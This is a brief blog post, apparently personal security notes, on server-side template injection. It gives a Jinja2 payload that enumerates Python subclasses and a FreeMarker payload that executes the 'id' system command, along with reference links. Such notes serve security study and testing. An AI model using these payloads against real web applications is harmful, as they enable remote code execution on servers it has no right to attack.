1 post for '2022/09/28'

SSTI

Paths and Information 2022. 9. 28. 07:30
{{config.__class__.__base__.__subclasses__()}}

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2

 

 


 

https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

 

wtdsoul
